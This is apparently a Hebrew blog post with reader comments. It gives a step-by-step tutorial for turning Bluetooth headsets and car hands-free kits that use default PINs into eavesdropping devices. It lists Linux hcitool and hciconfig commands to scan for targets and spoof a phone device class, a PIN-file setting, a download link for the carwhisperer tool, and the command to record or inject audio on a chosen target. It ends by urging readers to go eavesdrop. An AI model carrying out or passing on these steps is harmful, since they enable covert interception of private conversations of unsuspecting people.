תחשבו על הדבר הבא, לכמה ממכם יש אוזנית Bluetooth שנמצאת לידכם או לחילופין מחוברת לאוזן כל הזמן, כמו כן לכמה ממכם יש דיבורית Bluetooth באוטו ?
כאשר הגדרתם את האוזניה בפעם הראשונה נדרשתם להקיש קוד ברירת מחדל כגון:
0000
1234
1111
וכדומה נכון ?
לאחר הקשת הקוד התאפשר לכם להתחבר למכשיר הטלפון ולהשתמש באוזניה לפעילות יום יומית.
אז לאן אני חותר כפי שאתם יודעים קוד זה הוא ברירת מחדל ולא רק אנחנו יודעים עליו אלא גם האקרים שמחפשים סתם להשתעשע או לחילופין לבצע תקיפה ממוקדת.
ובעזרת קוד זה ניתן בדגמים מסוימים (שלא דורשים לחיצה על האוזניה) להתחבר ללא כל בעיה לאוזניה ולבצע תהליך של Pairing שבסופו ניתן להפוך את האוזניה למכשיר ציתות.
נשמע נחמד לא אז איך ניתן לבצע זאת
על מנת לבצע תהליך שכזה דרושים לנו המרכיבים הבאים
מחשב נייד
רכיב Bluetooth
מערכת הפעלה Linux
דרייברים של Bluetooth ו - bluez dev
לאחר שהתקנתם את הדרייברים ניתן לבחון האם ה – Bluetooth עובד בעזרת פקודת
Hcitool scan
פקודה זו תציג לכם את המכשירים אשר יש להם Bluetooth פעיל בקירבתכם.
השלב הבא הוא להפוך את המכשיר שלנו ממחשב למכשיר טלפון, על מנת שהאוזניה תאפשר לנו להתחבר אנו צריכים לגרום לה לחשוב שאנחנו טלפון ולא מחשב.
להלן רשימת הפקודות לביצוע:
Hciconfig hci0 class
פקודה זו מאפשרת לנו לראות כי אנחנו מוגדרים כמצב מחשב
Hciconfig hci0 0x50204
פקודה זו מחליפה את הגדרות ה – Bluetooth כך שיחשבו שהמחשב שלנו הוא מכשיר טלפון
Hciconfig hci0 class
הרצה נוספת של פקודה זו תציג לנו כי מצבנו השתנה וכי אנו מוגדרים כטלפון.
Nano /etc/blutooth/pin => 0000
פקודה זו תאפשר לנו להגדיר את PIN ברירת המחדל של האוזניה.
לאחר סיום ההגדרות יש להוריד את הכלי הבא:
http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
כלי זה מאפשר לנו להתחבר לאוזניה ולהקליט שמע ממנה (כמו מכשיר ציתות) או לחילופין להשמיע שמע לאוזניה.
הפקודה לביצוע הפעולה היא:
./ Carwhisperer hci0 voiceput.raw voiceget.raw bdaddr_of_target
על מנת לאתר את יעד התקיפה ניתן להשתמש בפקודת
Hcitool scan
ולבחור את יעד התקיפה.
זהו יאללה לכו תצותתו
3 תגובות:
בדקתי עבד על אוזנייה אחת שיש לי :)
על איזה איזה אוזניה זה עובד ??
לא עובד על פלנטרוניקס ~~
על אוזניות שמאפשרות חיבור ללא לחיצה על הלחצן ובעלות קוד ברירת מחדל כדוגמת 0000
הוסף רשומת תגובה